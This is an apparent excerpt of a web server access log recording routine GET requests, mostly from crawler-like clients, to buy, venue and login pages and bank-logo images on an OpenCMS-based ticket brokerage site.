192.95.29.138 - - [29/Jun/2024:06:06:22 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=672A3C6F-40D0-0A91-661F-3F64D5642035&sortorder=asc&column=price HTTP/1.1" 404 -
185.169.252.159 - - [29/Jun/2024:06:06:24 +0200] "GET /ticket2/opencms/sv/login/?edid=8AB2E4A1-D116-C62C-CE26-DEC6ED22AE38 HTTP/1.1" 200 74250
216.244.66.238 - - [29/Jun/2024:06:06:26 +0200] "GET /ticket2/opencms/dk/en/venue/?venueid=0CF5EE35-DFE3-ADC5-E0D6-1D381791145B HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:06:27 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=672A3C6F-40D0-0A91-661F-3F64D5642035&sortorder=desc&column=price HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:06:29 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=04A9823B-8F69-B2B4-6AE5-8FC04D38A9D5 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:06:33 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=672A3C6F-40D0-0A91-661F-3F64D5642035&sortorder=desc&column=row HTTP/1.1" 404 -
47.128.29.58 - - [29/Jun/2024:06:06:38 +0200] "GET /ticket2/opencms/nl/buy/?catid=5A89E483-58AD-080E-F363-E16CE738916A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 81246
51.222.253.5 - - [29/Jun/2024:06:06:39 +0200] "GET /ticket2/opencms/dk/venue/?venueid=FD96E284-2B2D-3C17-09D0-D66476535FBF HTTP/1.1" 200 71839
47.128.29.58 - - [29/Jun/2024:06:06:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.29.58 - - [29/Jun/2024:06:06:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.29.58 - - [29/Jun/2024:06:06:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.29.58 - - [29/Jun/2024:06:06:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.29.58 - - [29/Jun/2024:06:06:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
